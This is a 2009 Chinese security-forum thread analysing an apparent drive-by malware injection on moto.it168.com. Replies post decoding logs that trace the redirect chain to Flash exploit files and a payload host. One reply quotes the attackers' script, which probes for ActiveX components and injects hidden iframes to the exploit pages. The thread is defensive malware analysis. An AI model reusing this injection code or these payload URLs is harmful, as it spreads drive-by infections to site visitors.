收藏本站 |切换到宽版 | 更换论坛皮肤
 找回密码  忘记邮箱  QQ快速登录  快速登录  快速注册

卡饭»论坛 安全区 病毒样本 分享&分析区 网络安全(毒网分析) moto.it168.com疑为被挂马
12下一页
返回列表 发新帖
查看: 2933|回复: 10
收起左侧

[已鉴定] moto.it168.com疑为被挂马

[复制链接]
z069
发表于 2009-9-1 09:41:47 | 显示全部楼层 |阅读模式
刚才登陆IT168moto的时候,提示有试图访问恶意网址
登陆IP是一个广西南宁的
附图有真相: 1.jpg


每登陆一个页面,提示10个风险
全网站都提示


现在机器明显变卡
打字都有延迟
挂了
回复

举报

悠柚
发表于 2009-9-1 09:48:29 | 显示全部楼层
原始 - http://219.159.68.185/check.js
开始自动解析 - http://219.159.68.185/check.js
L1 - http://test1.9966.org/wwj2/1.htm?
L2 - http://d10gc.cn/x118/xx.html
L3 - http://d10gc.cn/x118/Td14.htm
L3 - http://d10gc.cn/x118/yt.htm
L3 - http://d10gc.cn/x118/dxxz.htm
L3 - http://d10gc.cn/x118/yut.htm
L4 - http://d10gc.cn/x118/17.js
L4 - http://d10gc.cn/x118/14.js
L4 - http://d10gc.cn/x118/15.js
L4 - http://d10gc.cn/x118/16.js
L4 - http://d10gc.cn/x118/a.jpg
L4 - http://d10gc.cn/x118/b.jpg
L4 - http://d10gc.cn/x118/url.jpg
自动解析 - Auto XOR - 高度可疑 - http://d.bgsew.com/xx/x118.css
L4 - http://d10gc.cn/x118/c.jpg
L4 - http://d10gc.cn/x118/d.jpg
L4 - http://d10gc.cn/x118/e.jpg
L4 - http://d10gc.cn/x118/f.jpg
L4 - http://d10gc.cn/x118/091.js
自动解析 - Auto XOR - 高度可疑 - http://d.bgsew.com/xx/x118.css
L4 - http://d10gc.cn/x118/092.js
L4 - http://d10gc.cn/x118/ytfl.htm
L4 - http://d10gc.cn/x118/ytfl1.htm
L4 - http://d10gc.cn/x118/of.htm
关注 - http://d.bgsew.com/xx/x118.css
L5 - http://d10gc.cn/x118/s1;o2.click}
L5 - http://d10gc.cn/x118/y1.htm
L5 - http://d10gc.cn/x118/t2.htm
L5 - http://d10gc.cn/x118/of.js
自动解析 - Auto XOR - 高度可疑 - http://d.bgsew.com/xx/x118.css
L5 - http://d10gc.cn/x118/of1.jpg
L5 - http://d10gc.cn/x118/of.jpg
L5 - http://d10gc.cn/x118/of2.jpg
可能的Flash溢出 - http://d10gc.cn/x118/x1.swf
NATIVE AUTO XOR - 高度可疑 - http://d.bgsew.com/xx/x118.css
可能的Flash溢出 - http://d10gc.cn/x118/x3.swf
NATIVE AUTO XOR - 高度可疑 - http://d.bgsew.com/xx/x118.css
可能的Flash溢出 - http://d10gc.cn/x118/x4.swf
NATIVE AUTO XOR - 高度可疑 - http://d.bgsew.com/xx/x118.css
可能的Flash溢出 - http://d10gc.cn/x118/x2.swf
NATIVE AUTO XOR - 高度可疑 - http://d.bgsew.com/xx/x118.css
可能的Flash溢出 - http://d10gc.cn/x118/x5.swf
NATIVE AUTO XOR - 高度可疑 - http://d.bgsew.com/xx/x118.css
可能的Flash溢出 - http://d10gc.cn/x118/x7.swf
NATIVE AUTO XOR - 高度可疑 - http://d.bgsew.com/xx/x118.css
可能的Flash溢出 - http://d10gc.cn/x118/x9.swf
NATIVE AUTO XOR - 高度可疑 - http://d.bgsew.com/xx/x118.css
可能的Flash溢出 - http://d10gc.cn/x118/x10.swf
NATIVE AUTO XOR - 高度可疑 - http://d.bgsew.com/xx/x118.css
可能的Flash溢出 - http://d10gc.cn/x118/x8.swf
NATIVE AUTO XOR - 高度可疑 - http://d.bgsew.com/xx/x118.css
可能的Flash溢出 - http://d10gc.cn/x118/x11.swf
NATIVE AUTO XOR - 高度可疑 - http://d.bgsew.com/xx/x118.css

输出的对象 - http://d.bgsew.com/xx/x118.css

此分析日志由 悠柚 使用 Astox v1 Build 1100 在 2009年9月1日9时48分24秒 生成。
回复

举报

z069
 楼主| 发表于 2009-9-1 10:05:08 | 显示全部楼层
登陆以后,机器极度缓慢
打字延迟2秒左右

使用AVAST!最新病毒库全盘最高等级查杀,无风险
回复

举报

冰比冰水冰 该用户已被删除
发表于 2009-9-1 10:12:16 | 显示全部楼层
现在没了。。。。
回复

举报

z069
 楼主| 发表于 2009-9-1 13:31:47 | 显示全部楼层
有啊,我13:29又登陆了一次,
还是提示啊
3.jpg
回复

举报

linjw
发表于 2009-9-1 13:42:45 | 显示全部楼层
关于:hxxp://219.159.68.185/check.js解密的日志(全体输出 -  70):

Level  0>http://219.159.68.185/check.js
Level  1>http://test2.9966.org/wwj2/1.htm?
Level  2>http://js.tongji.linezing.com/1270758/tongji.js
Level  2>http://d10gc.cn/x118/xx.html
Level  3>http://d10gc.cn/x118/yut.htm
Level  4>http://d10gc.cn/x118/of.htm
Level  5>http://d10gc.cn/x118/of2.jpg
Level  5>http://d10gc.cn/x118/of.jpg
Level  5>http://d10gc.cn/x118/of1.jpg
Level  5>http://d10gc.cn/x118/of.js
Level  6>http://d.bgsew.com/xx/x118.css  ●
Level  4>http://d10gc.cn/x118/ytfl1.htm
Level  5>http://d10gc.cn/x118/y1.htm
Level  6>http://d10gc.cn/x118/x5.swf  ●
Level  7>http://d.bgsew.com/xx/x118.css  ●
Level  6>http://d10gc.cn/x118/x2.swf  ●
Level  7>http://d.bgsew.com/xx/x118.css  ●
Level  6>http://d10gc.cn/x118/x4.swf  ●
Level  7>http://d.bgsew.com/xx/x118.css  ●
Level  6>http://d10gc.cn/x118/x3.swf  ●
Level  7>http://d.bgsew.com/xx/x118.css  ●
Level  6>http://d10gc.cn/x118/x1.swf  ●
Level  7>http://d.bgsew.com/xx/x118.css  ●
Level  5>http://d10gc.cn/x118/t2.htm
Level  6>http://d10gc.cn/x118/x11.swf  ●
Level  7>http://d.bgsew.com/xx/x118.css  ●
Level  6>http://d10gc.cn/x118/x8.swf  ●
Level  7>http://d.bgsew.com/xx/x118.css  ●
Level  6>http://d10gc.cn/x118/x10.swf  ●
Level  7>http://d.bgsew.com/xx/x118.css  ●
Level  6>http://d10gc.cn/x118/x9.swf  ●
Level  7>http://d.bgsew.com/xx/x118.css  ●
Level  6>http://d10gc.cn/x118/x7.swf  ●
Level  7>http://d.bgsew.com/xx/x118.css  ●
Level  5>http://d10gc.cn/x118/y1.htm
Level  4>http://d10gc.cn/x118/ytfl.htm
Level  5>http://d10gc.cn/x118/ff.html
Level  6>http://d10gc.cn/x118/xp.swf  ●
Level  6>http://d10gc.cn/x118/done.swf  ●
Level  6>http://d.bgsew.com/xx/x118.css  ●
Level  5>http://d10gc.cn/x118/ff.html
Level  5>http://d10gc.cn/x118/ie.html
Level  6>http://d10gc.cn/x118/xp.swf  ●
Level  6>http://d10gc.cn/x118/done.swf  ●
Level  6>http://d.bgsew.com/xx/x118.css  ●
Level  5>http://d10gc.cn/x118/ff.html
Level  5>http://d10gc.cn/x118/ie.html
Level  5>http://d10gc.cn/x118/ff.html
Level  3>http://d10gc.cn/x118/dxxz.htm
Level  4>http://d10gc.cn/x118/092.js
Level  4>http://d10gc.cn/x118/091.js
Level  5>http://d.bgsew.com/xx/x118.css  ●
Level  3>http://d10gc.cn/x118/yt.htm
Level  4>http://d10gc.cn/x118/f.jpg
Level  4>http://d10gc.cn/x118/e.jpg
Level  4>http://d10gc.cn/x118/d.jpg
Level  4>http://d10gc.cn/x118/c.jpg
Level  4>http://d10gc.cn/x118/url.jpg
Level  5>http://d.bgsew.com/xx/x118.css  ●
Level  4>http://d10gc.cn/x118/b.jpg
Level  4>http://d10gc.cn/x118/a.jpg
Level  3>http://d10gc.cn/x118/td14.htm
Level  4>http://d10gc.cn/x118/16.js
Level  4>http://d10gc.cn/x118/15.js
Level  4>http://d10gc.cn/x118/14.js
Level  5>http://d.bgsew.com/xx/x118.css  ●
Level  4>http://d10gc.cn/x118/17.js
Level  1>http://test2.9966.org/wwj2/1.htm?
Level  1>http://test2.9966.org/wwj2/1.htm?
Level  1>http://test2.9966.org/wwj2/1.htm?

日志由 Redoce2.0第40次修正版于 2009-9-1 13:42:35 生成。
回复

举报

250662772
发表于 2009-9-1 13:55:08 | 显示全部楼层
原帖由 冰比冰水冰 于 2009-9-1 10:12 发表
现在没了。。。。

你从这些搜索引擎进去才会执行挂马的网站
QQ截图未命名.jpg
回复

举报

冰比冰水冰 该用户已被删除
发表于 2009-9-1 14:43:21 | 显示全部楼层

回复 7楼 250662772 的帖子

原来是这样。。。。学习了
Log is generated by FreShow.
[wide]http://219.159.68.185/check.js
    [frame]http://219.159.68.185/http:\/\/test2.9966.org\/wwj2\/1.htm?
    [frame]http://219.159.68.185/http:\/\/test2.9966.org\/wwj2\/1.htm?
        [object]http://test2.9966.org/wwj2/1.htm?
            [frame]http://d10gc.cn/x118/xx.html
                [frame]http://d10gc.cn/x118/Td14.htm
                    [script]http://d10gc.cn/x118/17.js
                        [object]http://d.bgsew.com/xx/x118.css
                    [script]http://d10gc.cn/x118/14.js
                        [object]http://d.bgsew.com/xx/x118.css
                [frame]http://d10gc.cn/x118/yt.htm
                    [script]http://d10gc.cn/x118/url.jpg
                        [object]http://d10gc.cn/x118/thpt/:d/b.sgwec.mox//x1x81c.ss
                [frame]http://d10gc.cn/x118/dxxz.htm
                    [script]http://d10gc.cn/x118/091.js
                        [object]http://d.bgsew.com/xx/x118.css
                [frame]http://d10gc.cn/x118/yut.htm
                    [frame]http://d10gc.cn/x118/ytfl.htm
                    [frame]http://d10gc.cn/x118/ytfl1.htm
                        [frame]http://d10gc.cn/x118/y1.htm
                            [object]http://d10gc.cn/x118/x4.swf
                                [script]http://moto.it168.com/include/javascript/common.js
                                [script]http://moto.it168.com/include/javascript/menu.js
                                [script]http://moto.it168.com/include/javascript/ajax.js
                                [script]http://stat.it168.com/pv.js
                                [script]http://it168.wrating.com/a1.js
                                [script]http://imagesb.9966.org/images/view_sysmenub.png
                                [object]http://d.bgsew.com/xx/x118.css
                            [object]http://d10gc.cn/x118/x5.swf
                                [object]http://d.bgsew.com/xx/x118.css
                            [object]http://d10gc.cn/x118/x3.swf
                                [object]http://d.bgsew.com/xx/x118.css
                            [object]http://d10gc.cn/x118/x2.swf
                                [object]http://d.bgsew.com/xx/x118.css
                            [object]http://d10gc.cn/x118/x1.swf
                                [object]http://d.bgsew.com/xx/x118.css
                            [script]http://d10gc.cn/x118/swfobject.js
                        [frame]http://d10gc.cn/x118/t2.htm
                            [object]http://d10gc.cn/x118/x11.swf
                                [object]http://d.bgsew.com/xx/x118.css
                            [object]http://d10gc.cn/x118/x8.swf
                                [object]http://d.bgsew.com/xx/x118.css
                            [object]http://d10gc.cn/x118/x10.swf
                                [object]http://d.bgsew.com/xx/x118.css
                            [object]http://d10gc.cn/x118/x9.swf
                                [object]http://d.bgsew.com/xx/x118.css
                            [object]http://d10gc.cn/x118/x7.swf
                                [object]http://d.bgsew.com/xx/x118.css
                    [frame]http://d10gc.cn/x118/of.htm
                        [script]http://d10gc.cn/x118/of.js
                            [object]http://d10gc.cn/x118/thpt/:d/b.sgwec.mox//x1x81c.ss
                        [script]http://d10gc.cn/x118/of1.jpg
                        [script]http://d10gc.cn/x118/of.jpg
                        [script]http://d10gc.cn/x118/of2.jpg
            [script]http://js.tongji.linezing.com/1270758/tongji.js
    [frame]http://219.159.68.185/http:\/\/test2.9966.org\/wwj2\/1.htm?
    [frame]http://219.159.68.185/http:\/\/test2.9966.org\/wwj2\/1.htm?
回复

举报

dayang1717
发表于 2009-9-1 16:31:51 | 显示全部楼层
<script>
try{var b;
var ff=new ActiveXObject("L"+"A"+"S"+"H");}
catch(b){};                     
finally{if(b!="[object Error]"){document.write("<iframe width=100 height=0 src=ytfl.htm></iframe>");}}
try{var a;
var aa=new ActiveXObject("ShockwaveFlash.ShockwaveF"+"lash");}
catch(a){};                     
finally{if(a!="[object Error]"){document.write("<iframe width=100 height=0 src=ytfl1.htm></iframe>");}}
try{var c;
var f=new ActiveXObject("OWC10.S"+"prea"+"dsheet");}
catch(c){};                     
finally{if(c!="[object Error]"){aacc = "<iframe src=of.htm width=111 height=111></iframe>"
setTimeout("document.write(aacc)", 10000 );}}
</script>



请教var ff=new ActiveXObject("L"+"A"+"S"+"H");}
这个是检测的什么软件?
回复

举报

雨夜狂风
发表于 2009-9-1 20:32:47 | 显示全部楼层
不敢上
回复

举报

下一页 »
12下一页
返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2025-1-18 06:57 , Processed in 0.132406 second(s), 19 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表